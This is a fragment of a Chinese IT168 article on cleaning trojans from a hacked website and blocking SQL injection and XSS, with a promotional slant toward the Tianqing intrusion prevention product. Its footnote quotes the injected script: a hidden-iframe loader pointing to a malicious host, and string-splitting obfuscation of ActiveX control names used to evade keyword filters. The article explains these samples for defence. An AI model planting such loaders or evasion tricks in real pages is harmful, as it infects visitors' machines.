来源:IT168

近日款利用IE7


斩断注入黑手

了解了问题根源剩下就是防御问题了在启明星辰工程师协助下通过安星远程网站WebSite安全检查服务小任挨个清除了页面上所挂木马同时还发现网站WebSite存在数个SQL注入和XSS漏洞而原有网站WebSite安全检查代码由于无法进行语义级还原①无法彻底杜绝这两类攻击只有通过部署相应安全产品解决在对比了数家国内外Web安全防御产品后该网站WebSite最终选择了天清入侵防御产品其采用攻击机理分析方式对Web威胁如SQL注入、XSS攻击等进行精确阻断和传统基于数据特征匹配和基于异常模型构建Web安全相比有着更低漏报率和误报率天清入侵防御产品上线后当小任尝试用此前注入漏洞再次进行攻击时发现在产品事件监视台上已经及时出现了报警信息并予以了阻断再次采用安星检查服务后发现已经无法嗅探出任何漏洞

注①:继续拿/css/c.js木马举例该木马注入代码是hxxp://c.nuclear3.com/css/c.js但这个.js脚本并不是真正攻击代码而只是段代码:

document.write("{rame src='http://fvgit.cn/01/index.htm' width='100' height='0'}{/rame}");







这个脚本文件会在个隐藏框体中引用有害链接:'hxxp://fvgit.cn/01/index.htm真正攻击代码存在于这个链接处这段攻击代码异常简单摈弃了头标签体标签直接就是攻击代码且采用了替换躲避手法

var ll= ActiveXObject("snpv"+"w.Snap"+"shot View"+"er Cont"+"rol.1");}
rrooxx = "I" + "E" + "R" + "P" + "C" + "t" + "l" + ".I" + "ERP" + "Ctl.1";







这种替换躲避手法需要使用到语义还原如果仅检查关键字是无法发现和抵御此类攻击

注:代码中所有{ }实为〈 〉